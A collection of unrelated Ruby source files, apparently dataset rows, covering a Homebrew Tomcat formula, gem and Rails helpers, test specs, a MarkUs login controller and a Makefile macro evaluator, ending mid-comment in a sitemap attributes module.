url "https://www.apache.org/dyn/closer.cgi?path=tomcat/tomcat-8/v8.0.30/bin/apache-tomcat-8.0.30.tar.gz"
mirror "https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.30/bin/apache-tomcat-8.0.30.tar.gz"
sha256 "2fc3dde305e08388a12bd2868063ab6829a1d70acd9affe3a8707bd9679e0059"
depends_on :java => "1.7+"
resource "fulldocs" do
url "https://www.apache.org/dyn/closer.cgi?path=/tomcat/tomcat-8/v8.0.30/bin/apache-tomcat-8.0.30-fulldocs.tar.gz"
mirror "https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.30/bin/apache-tomcat-8.0.30-fulldocs.tar.gz"
version "8.0.30"
sha256 "c5f3966606a72223db519c1c2045bf7d34ab297dce2bc54187da355a251d0c07"
end
end
devel do
url "https://www.apache.org/dyn/closer.cgi?path=/tomcat/tomcat-9/v9.0.0.M3/bin/apache-tomcat-9.0.0.M3.tar.gz"
version "9.0.0.M3"
sha256 "edde79fdd49649ffc2ce6b8c7a6b665b45a450629b60e78f436f3528570e9104"
depends_on :java => "1.8+"
resource "fulldocs" do
url "https://www.apache.org/dyn/closer.cgi?path=/tomcat/tomcat-9/v9.0.0.M3/bin/apache-tomcat-9.0.0.M3-fulldocs.tar.gz"
version "9.0.0.M3"
sha256 "c430d0044823857099601d82afe0f15e715859dc17402f9ce7083d0647f63e9b"
end
end
bottle :unneeded
option "with-fulldocs", "Install full documentation locally"
def install
# Remove Windows scripts
rm_rf Dir["bin/*.bat"]
# Install files
prefix.install %w[ NOTICE LICENSE RELEASE-NOTES RUNNING.txt ]
libexec.install Dir["*"]
bin.install_symlink "#{libexec}/bin/catalina.sh" => "catalina"
(share/"fulldocs").install resource("fulldocs") if build.with? "fulldocs"
end
test do
ENV["CATALINA_BASE"] = testpath
cp_r Dir["#{libexec}/*"], testpath
rm Dir["#{libexec}/logs/*"]
pid = fork do
exec bin/"catalina", "start"
end
sleep 3
begin
system bin/"catalina", "stop"
ensure
Process.wait pid
end
File.exist? testpath/"logs/catalina.out"
end
end
| 31.701493 | 124 | 0.693503 |
79cad68118741258a41a2270602e598fcb4e81e9 | 1,869 |
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "Dark_Library/version"
Gem::Specification.new do |spec|
spec.name = "Dark_Library"
spec.version = DarkLibrary::VERSION
spec.authors = ["Ilovaiskyi Valery"]
spec.email = ["[email protected]"]
spec.summary = %q{TODO: Write a short summary, because RubyGems requires one.}
spec.description = %q{TODO: Write a longer description or delete this line.}
spec.homepage = "TODO: Put your gem's website or public repo URL here."
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
spec.metadata["homepage_uri"] = spec.homepage
spec.metadata["source_code_uri"] = "TODO: Put your gem's public repo URL here."
spec.metadata["changelog_uri"] = "TODO: Put your gem's CHANGELOG.md URL here."
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.17"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "minitest", "~> 5.0"
end
| 43.465116 | 96 | 0.678438 |
f85d3ade364af77713db64d335d9eebb17f94303 | 398 | module Mongoid
module Token
module Finders
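      # Defines a `find_by_<field_name>` singleton method on +klass+. A usage
      # sketch, assuming a hypothetical Document model that stores a :token:
      #
      #   Mongoid::Token::Finders.define_custom_token_finder_for(Document)
      #   Document.find_by_token("4f9h27")        # single token lookup
      #   Document.find_by_token(%w[a1 b2 c3])    # an array becomes an $in query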
def self.define_custom_token_finder_for(klass, field_name = :token)
klass.define_singleton_method(:"find_by_#{field_name}") do |token|
if token.is_a?(Array)
self.in field_name.to_sym => token
else
self.find_by field_name.to_sym => token
end
end
end
end
end
end
| 24.875 | 74 | 0.613065 |
6a258c3ac5a6a47ba4fe185a3bf004f3ff102f2f | 1,921 | # frozen_string_literal: true
module Spree::Image::PaperclipAttachment
extend ActiveSupport::Concern
included do
validate :no_attachment_errors
has_attached_file :attachment,
styles: { mini: '48x48>', small: '400x400>', product: '680x680>', large: '1200x1200>' },
default_style: :product,
default_url: 'noimage/:style.png',
url: '/spree/products/:id/:style/:basename.:extension',
path: ':rails_root/public/spree/products/:id/:style/:basename.:extension',
convert_options: { all: '-strip -auto-orient -colorspace sRGB' }
validates_attachment :attachment,
presence: true,
content_type: { content_type: Spree::Config.allowed_image_mime_types }
# save the w,h of the original image (from which others can be calculated)
# we need to look at the write-queue for images which have not been saved yet
after_post_process :find_dimensions, if: :valid?
end
def url(size)
attachment.url(size)
end
def filename
attachment_file_name
end
def attachment_present?
attachment.present?
end
def find_dimensions
temporary = attachment.queued_for_write[:original]
filename = temporary.path unless temporary.nil?
filename = attachment.path if filename.blank?
geometry = Paperclip::Geometry.from_file(filename)
self.attachment_width = geometry.width
self.attachment_height = geometry.height
end
# if there are errors from the plugin, then add a more meaningful message
def no_attachment_errors
unless attachment.errors.empty?
# uncomment this to get rid of the less-than-useful interim messages
# errors.clear
errors.add :attachment, "Paperclip returned errors for file '#{attachment_file_name}' - check ImageMagick installation or image source file."
false
end
end
end
| 34.303571 | 147 | 0.684019 |
91a335cd504658eae717a81fd8cfed44bc7a299b | 842 | # frozen_string_literal: true
module AutoDevopsHelper
def show_auto_devops_callout?(project)
Feature.disabled?(:auto_devops_banner_disabled) &&
show_callout?('auto_devops_settings_dismissed') &&
can?(current_user, :admin_pipeline, project) &&
project.has_auto_devops_implicitly_disabled? &&
!project.repository.gitlab_ci_yml &&
!project.ci_integration
end
def badge_for_auto_devops_scope(auto_devops_receiver)
return unless auto_devops_receiver.auto_devops_enabled?
case auto_devops_receiver.first_auto_devops_config[:scope]
when :project
nil
when :group
s_('CICD|group enabled')
when :instance
s_('CICD|instance enabled')
end
end
def auto_devops_settings_path(project)
project_settings_ci_cd_path(project, anchor: 'autodevops-settings')
end
end
| 28.066667 | 71 | 0.748219 |
01323be37f16b429116f16b6cbe1fe43d8ef3efe | 194 | def image_fixture_file
@image_fixture_file ||= File.open(Rails.root.join('test/fixtures/minister-of-funk.960x640.jpg'))
end
Dir[Rails.root.join('test/factories/*.rb')].each { |f| require f }
| 32.333333 | 98 | 0.737113 |
4a5556725895a92376adf06a653f8f7720a03053 | 2,852 | # frozen_string_literal: true
require "search"
module Cask
class Cmd
# Abstract superclass for all `brew cask` commands.
#
# @api private
class AbstractCommand
include Homebrew::Search
def self.min_named
nil
end
def self.max_named
nil
end
def self.banner_args
if min_named == :cask && max_named != 1
" <cask>"
elsif max_named&.zero?
""
else
" [<cask>]"
end
end
def self.banner_headline
"`#{command_name}` [<options>]#{banner_args}"
end
OPTIONS = [
[:switch, "--[no-]binaries", {
description: "Disable/enable linking of helper executables. Default: enabled",
env: :cask_opts_binaries,
}],
[:switch, "--require-sha", {
description: "Require all casks to have a checksum.",
env: :cask_opts_require_sha,
}],
[:switch, "--[no-]quarantine", {
description: "Disable/enable quarantining of downloads. Default: enabled",
env: :cask_opts_quarantine,
}],
].freeze
def self.parser(&block)
banner = <<~EOS
`cask` #{banner_headline}
#{description}
EOS
min_n = min_named
max_n = max_named
Cmd.parser do
usage_banner banner
instance_eval(&block) if block_given?
OPTIONS.each do |option|
send(*option)
end
min_named min_n unless min_n.nil?
max_named max_n unless max_n.nil?
end
end
def self.command_name
@command_name ||= name.sub(/^.*:/, "").gsub(/(.)([A-Z])/, '\1_\2').downcase
end
def self.abstract?
name.split("::").last.match?(/^Abstract[^a-z]/)
end
def self.visible?
true
end
def self.help
parser.generate_help_text
end
def self.short_description
description.split(".").first
end
def self.run(*args)
new(*args).run
end
attr_reader :args
def initialize(*args)
@args = self.class.parser.parse(args)
end
private
def casks(alternative: -> { [] })
return @casks if defined?(@casks)
@casks = args.named.empty? ? alternative.call : args.named.to_casks
rescue CaskUnavailableError => e
reason = [e.reason, *suggestion_message(e.token)].join(" ")
raise e.class.new(e.token, reason)
end
def suggestion_message(cask_token)
matches = search_casks(cask_token)
if matches.one?
"Did you mean “#{matches.first}”?"
elsif !matches.empty?
"Did you mean one of these?\n#{Formatter.columns(matches.take(20))}"
end
end
end
end
end
| 22.456693 | 88 | 0.539972 |
f8b25a0438e50bd4baba11d2044ef35c64af18ba | 299 | require 'rails_helper'
RSpec.describe StoryText, type: :model do
it "has a limit on the story cache field" do
s = StoryText.new
s.body = "Z" * 16_777_218
s.valid?
expect(s.errors[:body]).to eq([I18n.t('activerecord.errors.models.story_text.attributes.body.too_long')])
end
end
| 24.916667 | 109 | 0.695652 |
1a69eb0b7a8e919ad0d204d4d03f761633fcdd17 | 952 | property :git_url, String
use 'common_properties'
action_class do
include Asdf::Cookbook::Helpers
def plugin_installed?
::Dir.exist?("#{asdf_path}/plugins/#{new_resource.name}")
end
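  # `--all` updates every installed plugin at once, so no specific plugin needs
  # to be present; a named plugin must already be installed to be updated.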
def plugin_can_be_updated?
new_resource.name == '--all' || new_resource.name != '--all' && plugin_installed?
end
end
action :add do
asdf_script "asdf plugin add #{new_resource.name}" do
live_stream new_resource.live_stream
user new_resource.user if new_resource.user
not_if { plugin_installed? }
end
end
action :update do
asdf_script "asdf plugin update #{new_resource.name}" do
live_stream new_resource.live_stream
user new_resource.user if new_resource.user
only_if { plugin_can_be_updated? }
end
end
action :remove do
asdf_script "asdf plugin remove #{new_resource.name}" do
live_stream new_resource.live_stream
user new_resource.user if new_resource.user
only_if { plugin_installed? }
end
end
| 23.8 | 85 | 0.740546 |
1a33d33fa377073b7f490383d9d0d2fe5c43f5da | 524 | namespace :db do
namespace :mongoid do
desc 'Migrate the documents specified by criteria. criteria is optional'
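    # Invocation sketch (the criteria string is eval'd into a Mongoid criteria;
    # the User model here is only an example):
    #   rake db:mongoid:lazy_migrate['User.where(:migrated => false)']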
task :lazy_migrate, [:criteria] => :environment do |t, args|
criteria = args.criteria ? eval(args.criteria) : nil
Mongoid::LazyMigration.migrate(criteria)
end
desc 'Cleanup a migration'
task :cleanup_migration, [:model] => :environment do |t, args|
raise "Please provide a model" unless args.model
Mongoid::LazyMigration.cleanup(eval(args.model))
end
end
end
| 32.75 | 76 | 0.692748 |
62565e86ea47b48ee0dd7503834dac9e78c6ae71 | 174 | class AppsController < InheritedResources::Base
authorize_resource
private
def app_params
params.require(:app).permit(:name, :url, :description)
end
end
| 15.818182 | 60 | 0.718391 |
bbd2dc293b4538dbb4dd654f875038eba383dcd6 | 2,558 | require 'spec_helper'
RSpec.describe Mysql2::Instrumentation do
describe "Class Methods" do
it { should respond_to :instrument }
end
let (:tracer) { OpenTracingTestTracer.build }
before do
Mysql2::Instrumentation.instrument(tracer: tracer)
# prevent actual client connections
allow_any_instance_of(Mysql2::Client).to receive(:connect) do |*args|
@connect_args = []
@connect_args << args
end
# mock query_original, since we don't care about the results
allow_any_instance_of(Mysql2::Client).to receive(:query_original).and_return(Mysql2::Result.new)
end
  let (:host) { 'localhost' }
  let (:database) { 'test_sql2' }
  let (:username) { 'root' }
let (:client) { Mysql2::Client.new(:host => host, :database => database, :username => username) }
describe :instrument do
it "patches the class's query method" do
expect(client).to respond_to(:query)
expect(client).to respond_to(:query_original)
end
end
describe 'successful query' do
it 'calls query_original when calling query' do
expect(client).to receive(:query_original)
client.query("SELECT * FROM test_mysql2")
end
it 'adds a span for a query with tags' do
statement = "SELECT * FROM test_mysql2" * 4096
client.query(statement)
expect(tracer.spans.count).to eq 1
expect(tracer.spans.last.operation_name).to eq 'SELECT'
expected_tags = {
'component' => 'mysql2',
'db.type' => 'mysql',
'span.kind' => 'client',
'db.instance' => database,
'db.statement' => statement[0..1023],
'db.user' => username,
}
expect(tracer.spans.last.tags).to eq expected_tags
end
end
describe 'failed query' do
before do
allow(client).to receive(:query_original).and_raise('error')
end
it 'sets the error tag and log' do
statement = 1234
error = nil
begin
client.query(statement)
rescue => e
error = e
end
expected_tags = {
'component' => 'mysql2',
'db.type' => 'mysql',
'span.kind' => 'client',
'db.instance' => database,
'db.statement' => statement.to_s,
'db.user' => username,
'error' => true,
'sfx.error.kind' => error.class.to_s,
'sfx.error.message' => error.to_s,
'sfx.error.stack' => error.backtrace.join('\n')
}
expect(tracer.spans.last.tags).to eq expected_tags
expect(tracer.spans.last.operation_name).to eq 'sql.query'
end
end
end
| 27.804348 | 100 | 0.622752 |
ff37f1d33329adf604e7a5dd761ce70377b62dbb | 397 | require 'sms_tools/version'
require 'sms_tools/encoding_detection'
require 'sms_tools/gsm_encoding'
if defined?(::Rails) and ::Rails.version >= '3.1'
require 'sms_tools/rails/engine'
end
module SmsTools
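  # Whether the GSM 03.38 encoding should be considered at all (defaults to
  # true). A configuration sketch, e.g. from a Rails initializer:
  #
  #   SmsTools.use_gsm_encoding = false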
class << self
def use_gsm_encoding?
@use_gsm_encoding.nil? ? true : @use_gsm_encoding
end
def use_gsm_encoding=(value)
@use_gsm_encoding = value
end
end
end
| 19.85 | 55 | 0.715365 |
bb3f67fc5d4e3d91900f470769552f4862aae0bd | 79 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'extrapost'
| 26.333333 | 58 | 0.734177 |
e9e6585c15f28af1009d67edcb3e85820bb115ae | 746 | Before do
# As of 2017-10-30 it appears that tests do not complete in linux environments
# if an element is not visible on the page. This should not be a problem and
# cannot be replicated locally when running on OSX, however has been confirmed
# in our AWS environments and on local Ubuntu machines.
# Therefore we've added this functionality that looks for a custom
# window_size element on the config object and if present, sets the window
# size at the start of each test
if Quke::Quke.config.custom && Quke::Quke.config.custom["window_size"]
Capybara.current_session.current_window.resize_to(
Quke::Quke.config.custom["window_size"]["width"],
Quke::Quke.config.custom["window_size"]["height"]
)
end
end
| 46.625 | 80 | 0.739946 |
1a8d9c8174e9130bf5be8915e198bb1b4366abd6 | 16,439 |
# Controller responsible for providing login and logout processes
# as well as displaying main page
class MainController < ApplicationController
include ApplicationHelper, MainHelper
protect_from_forgery with: :exception, except: [:login, :page_not_found]
# check for authorization
before_action :authorize_for_user,
except: [:login,
:page_not_found,
:check_timeout]
before_action :authorize_for_admin_and_admin_logged_in_as, only: [:login_as]
layout 'main'
#########################################################################
# Authentication
# Handles login requests; usually redirected here when trying to access
# the website and has not logged in yet, or session has expired. User
# is redirected to main page if session is still active and valid.
def login
session[:job_id] = nil
# external auth has been done, skip markus authorization
if MarkusConfigurator.markus_config_remote_user_auth
if @markus_auth_remote_user.nil?
render 'shared/http_status', formats: [:html], locals: { code: '403', message: HttpStatusHelper::ERROR_CODE['message']['403'] }, status: 403, layout: false
return
else
login_success = login_without_authentication(@markus_auth_remote_user)
if login_success
uri = session[:redirect_uri]
session[:redirect_uri] = nil
refresh_timeout
current_user.set_api_key # set api key in DB for user if not yet set
# redirect to last visited page or to main page
redirect_to( uri || { action: 'index' } )
return
else
@login_error = flash[:error][0]
render :remote_user_auth_login_fail
return
end
end
end
# Check if it's the user's first visit this session
# Need to accommodate redirects for locale
if params.key?(:locale)
if session[:first_visit].nil?
@first_visit = true
session[:first_visit] = 'false'
else
@first_visit = false
end
end
@current_user = current_user
# redirect to main page if user is already logged in.
if logged_in? && !request.post?
redirect_to action: 'index'
return
end
return unless request.post?
# strip username
params[:user_login].strip!
# Get information of the user that is trying to login if his or her
# authentication is valid
validation_result = validate_user(params[:user_login], params[:user_login], params[:user_password])
unless validation_result[:error].nil?
flash_now(:error, validation_result[:error])
render :login, locals: { user_login: params[:user_login] }
return
end
# validation worked
found_user = validation_result[:user]
if found_user.nil?
return
end
# Has this student been hidden?
if found_user.student? && found_user.hidden
flash_now(:error, I18n.t('account_disabled'))
redirect_to(action: 'login') && return
end
self.current_user = found_user
if logged_in?
uri = session[:redirect_uri]
session[:redirect_uri] = nil
refresh_timeout
current_user.set_api_key # set api key in DB for user if not yet set
# redirect to last visited page or to main page
redirect_to( uri || { action: 'index' } )
else
flash_now(:error, I18n.t(:login_failed))
end
end
# Clear the sesssion for current user and redirect to login page
def logout
logout_redirect = MarkusConfigurator.markus_config_logout_redirect
if logout_redirect == 'NONE'
page_not_found
return
end
m_logger = MarkusLogger.instance
# The real_uid field of session keeps track of the uid of the original
# user that is logged in if there is a role switch
if !session[:real_uid].nil? && !session[:uid].nil?
      # An admin was logged in as a student or grader
m_logger.log("Admin '#{User.find_by_id(session[:real_uid]).user_name}' logged out from '#{User.find_by_id(session[:uid]).user_name}'.")
else
      # The user was not assuming another role
m_logger.log("User '#{current_user.user_name}' logged out.")
end
clear_session
cookies.delete :auth_token
reset_session
if logout_redirect == 'DEFAULT'
redirect_to action: 'login'
else
redirect_to logout_redirect
end
end
def index
@current_user = current_user
if @current_user.student? or @current_user.ta?
redirect_to controller: 'assignments', action: 'index'
return
end
@assignments = Assignment.unscoped.includes([
:assignment_stat, :groupings, :ta_memberships,
:pr_assignment,
groupings: :current_submission_used,
submission_rule: :assignment
]).order('due_date ASC')
@grade_entry_forms = GradeEntryForm.unscoped.includes([
:grade_entry_items
]).order('id ASC')
@current_assignment = Assignment.get_current_assignment
@current_ta = @current_assignment.tas.first unless @current_assignment.nil?
@tas = @current_assignment.tas unless @current_assignment.nil?
render :index, layout: 'content'
end
def about
# dummy action for remote rjs calls
# triggered by clicking on the about icon
end
def reset_api_key
render 'shared/http_status', formats: [:html], locals: { code: '404', message: HttpStatusHelper::ERROR_CODE['message']['404'] }, status: 404, layout: false and return unless request.post?
# Students shouldn't be able to change their API key
unless @current_user.student?
@current_user.reset_api_key
@current_user.save
else
render 'shared/http_status', formats: [:html], locals: { code: '404', message: HttpStatusHelper::ERROR_CODE['message']['404'] }, status: 404, layout: false and return
end
render 'api_key_replace', locals: {user: @current_user },
formats: [:js], handlers: [:erb]
end
# Render 404 error (page not found) if no other route matches.
# See config/routes.rb
def page_not_found
render 'shared/http_status', formats: [:html], locals: { code: '404', message: HttpStatusHelper::ERROR_CODE['message']['404'] }, status: 404, layout: false
end
# Authenticates the admin (i.e. validates her password). Given the user, that
# the admin would like to login as and the admin's password switch to the
# desired user on success.
#
# If the current user already recorded, matches the password entered in the
# form, grant the current user (an admin) access to the account of the user
# name entered in the form.
#
# Relevant partials:
# role_switch_handler
# role_switch_error
# role_switch_content
# role_switch
def login_as
validation_result = nil
real_user = (session[:real_uid] && User.find_by_id(session[:real_uid])) ||
current_user
if MarkusConfigurator.markus_config_remote_user_auth
validation_result = validate_user_without_login(
params[:effective_user_login],
real_user.user_name)
else
validation_result = validate_user(
params[:effective_user_login],
real_user.user_name,
params[:admin_password])
end
unless validation_result[:error].nil?
# There were validation errors
render partial: 'role_switch_handler',
formats: [:js], handlers: [:erb],
locals: { error: validation_result[:error] }
return
end
found_user = validation_result[:user]
if found_user.nil?
return
end
# Check if an admin trying to login as the current user
if found_user == current_user
# error
render partial: 'role_switch_handler',
formats: [:js], handlers: [:erb],
# TODO: put better error message
locals: { error: I18n.t(:login_failed) }
return
end
# Check if an admin is trying to login as another admin.
# Should not be allowed unless switching back to original admin role
if found_user.admin? && found_user != real_user
# error
render partial: 'role_switch_handler',
formats: [:js], handlers: [:erb],
locals: { error: I18n.t(:cannot_login_as_another_admin) }
return
end
# Save the uid of the admin that is switching roles if not already saved
session[:real_uid] ||= session[:uid]
# Log the date that the role switch occurred
m_logger = MarkusLogger.instance
if current_user != real_user
# Log that the admin dropped role of another user
m_logger.log("Admin '#{real_user.user_name}' logged out from " +
"'#{current_user.user_name}'.")
end
if found_user != real_user
# Log that the admin assumed role of another user
m_logger.log("Admin '#{real_user.user_name}' logged in as " +
"'#{found_user.user_name}'.")
else
# Reset real user id because admin resumed their real role
session[:real_uid] = nil
end
# Change the uid of the current user
self.current_user = found_user
if logged_in?
session[:redirect_uri] = nil
refresh_timeout
current_user.set_api_key # set api key in DB for user if not yet set
# All good, redirect to the main page of the viewer, discard
# role switch modal
render partial: 'role_switch_handler',
formats: [:js], handlers: [:erb],
locals: { error: nil }
else
render partial: 'role_switch_handler',
formats: [:js], handlers: [:erb],
locals: { error: I18n.t(:login_failed) }
end
end
def role_switch
# dummy action for remote rjs calls
# triggered by clicking on the "Switch role" link
# please keep.
end
# Action only relevant if REMOTE_USER config is on and if an
# admin switched role. Since there might not be a logout link
# provide a vehicle to expire the session (I.e. cancel the
# role switch).
def clear_role_switch_session
m_logger = MarkusLogger.instance
# The real_uid field of session keeps track of the uid of the original
# user that is logged in if there is a role switch
if !session[:real_uid].nil? && !session[:uid].nil?
# An admin was logged in as a student or grader
m_logger.log("Admin '#{User.find_by_id(session[:real_uid]).user_name}' logged out from '#{User.find_by_id(session[:uid]).user_name}'.")
else
      # The user was not assuming another role
m_logger.log("WARNING: Possible break in attempt from '#{current_user.user_name}'.")
end
clear_session
cookies.delete :auth_token
reset_session
redirect_to action: 'login'
end
def check_timeout
if !check_warned && check_imminent_expiry
render template: 'main/timeout_imminent'
set_warned
else
head :ok
end
end
private
def login_without_authentication(markus_auth_remote_user)
found_user = User.authorize(markus_auth_remote_user)
# if not nil, user authorized to enter MarkUs
if found_user.nil?
# This message actually means "User not allowed to use MarkUs",
# but it's from a security-perspective
# not a good idea to report this to the outside world. It makes it
# easier for attempted break-ins
# if one can distinguish between existent and non-existent users.
flash_message(:error, I18n.t(:login_failed))
return false
end
# Has this student been hidden?
if found_user.student? && found_user.hidden
flash_message(:error, I18n.t('account_disabled'))
return false
end
# For admins we have a possibility of role switches,
# so check if the real_uid is set in the session.
if found_user.admin? && !session[:real_uid].nil? &&
session[:real_uid] != session[:uid]
self.current_user = User.find_by_id(session[:uid])
m_logger = MarkusLogger.instance
m_logger.log("Admin '#{found_user.user_name}' logged in as '#{current_user.user_name}'.")
else
self.current_user = found_user
end
if logged_in?
true
else
flash_message(:error, I18n.t(:login_failed))
false
end
end
# Returns the user with user name "effective_user" from the database given that the user
# with user name "real_user" is authenticated. Effective and real users might be the
# same for regular logins and are different on an assume role call.
#
# This function is called both by the login and login_as actions.
def validate_user(effective_user, real_user, password)
validation_result = Hash.new
validation_result[:user] = nil # Let's be explicit
# check for blank username and password
blank_login = effective_user.blank?
blank_pwd = password.blank?
validation_result[:error] = get_blank_message(blank_login, blank_pwd)
return validation_result if blank_login || blank_pwd
# Two stage user verification: authentication and authorization
authenticate_response = User.authenticate(real_user,
password)
if authenticate_response == User::AUTHENTICATE_BAD_PLATFORM
validation_result[:error] = I18n.t('external_authentication_not_supported')
return validation_result
end
if (defined? VALIDATE_CUSTOM_STATUS_DISPLAY) &&
authenticate_response == User::AUTHENTICATE_CUSTOM_MESSAGE
validation_result[:error] = VALIDATE_CUSTOM_STATUS_DISPLAY
return validation_result
end
if authenticate_response == User::AUTHENTICATE_SUCCESS
# Username/password combination is valid. Check if user is
# allowed to use MarkUs.
#
# sets this user as logged in if effective_user is a user in MarkUs
found_user = User.authorize(effective_user)
# if not nil, user authorized to enter MarkUs
if found_user.nil?
# This message actually means "User not allowed to use MarkUs",
# but it's from a security-perspective
# not a good idea to report this to the outside world. It makes it
# easier for attempted break-ins
# if one can distinguish between existent and non-existent users.
if defined? VALIDATE_USER_NOT_ALLOWED_DISPLAY
validation_result[:error] = VALIDATE_USER_NOT_ALLOWED_DISPLAY
else
validation_result[:error] = I18n.t(:login_failed)
end
return validation_result
end
else
if defined? VALIDATE_LOGIN_INCORRECT_DISPLAY
validation_result[:error] = VALIDATE_LOGIN_INCORRECT_DISPLAY
else
validation_result[:error] = I18n.t(:login_failed)
end
return validation_result
end
# All good, set error to nil. Let's be explicit.
# Also, set the user key to found_user
validation_result[:error] = nil
validation_result[:user] = found_user
validation_result
end
# Returns the user with user name "effective_user" from the database given that the user
# with user name "real_user" is authenticated. Effective and real users must be
# different.
def validate_user_without_login(effective_user, real_user)
validation_result = Hash.new
validation_result[:user] = nil # Let's be explicit
# check for blank username
blank_login = effective_user.blank?
validation_result[:error] = get_blank_message(blank_login, false)
return validation_result if blank_login
# Can't do user authentication, for a remote user setup, so
# only do authorization (i.e. valid user) checks.
found_user = User.authorize(effective_user)
# if not nil, user authorized to enter MarkUs
if found_user.nil?
# This message actually means "User not allowed to use MarkUs",
# but it's from a security-perspective
# not a good idea to report this to the outside world. It makes it
# easier for attempted break-ins
# if one can distinguish between existent and non-existent users.
if defined? VALIDATE_USER_NOT_ALLOWED_DISPLAY
validation_result[:error] = VALIDATE_USER_NOT_ALLOWED_DISPLAY
else
validation_result[:error] = I18n.t(:login_failed)
end
return validation_result
end
# All good, set error to nil. Let's be explicit.
# Also, set the user key to found_user
validation_result[:error] = nil
validation_result[:user] = found_user
validation_result
end
end
| 35.736957 | 191 | 0.673946 |
2179311b0d1636cefeb6925fa7c42f37b8111613 | 2,501 | module Gql::Runtime
# ATTENTION: use :: namespace
# Rubel::Base inherits from BasicObject. This means we don't have
# access to the default namespace, so prepend classes and modules
# with ::.
class Debug < Rubel::Runtime::Console
attr_reader :scope
def initialize(scope = nil)
@scope = scope
end
def logger
scope.graph.logger
end
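    # Wraps the yielded block in a graph logger entry; +type+ defaults to :gql
    # and is overridden by the FunctionDebug wrappers below (e.g. :update).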
def log(key, attr_name, options = {}, &block)
type = options.fetch(:type, :gql)
if block_given?
logger.log(type, key, attr_name, nil, options, &block)
else
logger.log(type, key, attr_name, nil, options)
end
end
include ::Gql::Runtime::Functions::Legacy
include ::Gql::Runtime::Functions::Constants
include ::Gql::Runtime::Functions::Traversal
include ::Gql::Runtime::Functions::Aggregate
include ::Gql::Runtime::Functions::Control
include ::Gql::Runtime::Functions::Lookup
include ::Gql::Runtime::Functions::Policy
include ::Gql::Runtime::Functions::Update
include ::Gql::Runtime::Functions::Helper
include ::Gql::Runtime::Functions::Curves
include ::Gql::Runtime::Functions::Core
module FunctionDebug
# @private
def update_element_with(object, attribute_name, value)
obj_key = object.key rescue nil
log("UPDATE", "#{scope.input_key}: #{obj_key}.#{attribute_name} =", :type => :update) do
super
end
end
def NORMCDF(*args)
log("NORMCDF", "NORMCDF") do
super
end
end
def Q(key)
log("Q", "Q: #{key}", :gquery_key => key) do
super
end
end
def GREATER(*args)
log("GREATER", "GREATER: #{args.join(' ')}") do
super
end
end
def M(elements, attr_name)
log("MAP: #{attr_name}", "MAP: #{attr_name}") do
super
end
end
def SQRT(*args)
log("SQRT", "SQRT") do
super
end
end
def PRODUCT(*args)
log("PRODUCT", "PRODUCT") do
super
end
end
def SUM(*args)
log("SUM", "SUM") do
super
end
end
def GET(element, attr_name)
key = element.key rescue nil
log("MAP/GET: #{key}", "MAP/GET: #{key}", {:node => key}) do
super
end
end
def G(key)
log("GROUP: #{key}", "GROUP: #{key}") do
super
end
end
end
include FunctionDebug
end
end
| 23.157407 | 96 | 0.555778 |
39489b77e8bb4041216c1d50c68f0aee4294943d | 1,728 | require 'set'
module Makefile
MACRO_REF_PATTERN = %r!
\$ (?:
\(
(?<paren> [^:)]+ ) (?: :(?<paren_subst>[^=]+) = (?<paren_substval>[^)]*) )?
\) |
{
(?<brace> [^:}]+ ) (?: :(?<brace_subst>[^=]+) = (?<brace_substval>[^}]*) )?
} |
(?<single> [^({] )
)
!x
# An expression which can contain macro reference
class Expression
def initialize(raw_text)
@raw_text = raw_text
end
attr_reader :raw_text
def evaluate(target=nil, macroset)
evaluate_internal(target, macroset, Set.new)
end
# Shows some implementation details of #evaluate
#
# Only Makefile::Macro is allowed to call this method.
# Others should use #evaluate
#
# @private
def evaluate_internal(target, macroset, parent_refs)
raw_text.gsub(MACRO_REF_PATTERN) do
match = $~
case
when match[:single]
type, name = :single, $~[:single]
when match[:paren]
type = :quoted
name = match[:paren]
substpat, substexpr = match[:paren_subst], match[:paren_substval]
when match[:brace]
type = :quoted
name = match[:brace]
substpat, substexpr = match[:brace_subst], match[:brace_substval]
else
raise 'never reach'
end
macro = macroset[name]
if macro&.match?(type)
expanded = macro.expand_internal(target, macroset, parent_refs)
next expanded unless substpat
replacement = Expression.new(substexpr).
evaluate_internal(target, macroset, parent_refs)
expanded.gsub(/#{Regexp.escape substpat}(?=\s|$)/, replacement)
end
end
end
end
end
| 27 | 83 | 0.5625 |
b9408fa6f3ffc5c9e3e9c75426155180c379a03e | 8,704 | require 'active_support/concern'
module DuckMap
##################################################################################
# This module has a single purpose. To declare a class-level attribute using the Rails class_attribute method.
# Also, we are using ActiveSupport::Concern and the included block. This module is included in
# ActionController::Base, so, every controller object will have the attribute.
#
# See {DuckMap::Attributes::ClassMethods#sitemap_attributes} for an explanation.
module InheritableClassAttributes
extend ActiveSupport::Concern
################################################################################
included do
class_eval do
class_attribute :sitemap_attributes_hash
class_attribute :sitemap_attributes_defined
end
end
end
##################################################################################
# Module used to add Sitemap attributes to an object.
module Attributes
extend ActiveSupport::Concern
##################################################################################
module ClassMethods
##################################################################################
## See {DuckMap::Attributes#is_sitemap_attributes_defined? is_sitemap_attributes_defined?}
# @return [TrueClass, FalseClass]
def is_sitemap_attributes_defined?
if self.sitemap_attributes_defined.nil?
self.sitemap_attributes_defined = false
end
return self.sitemap_attributes_defined
end
##################################################################################
# Returns the entire attributes Hash that has been defined for an object. The actual Hash is maintained via an accessor method named: sitemap_attributes_hash.
# {#sitemap_attributes sitemap_attributes} is actually a wrapper method for sitemap_attributes_hash accessor method.
#
# There are actually two definitions of sitemap_attributes_hash accessor method. The purpose of two definitions is to allow common code
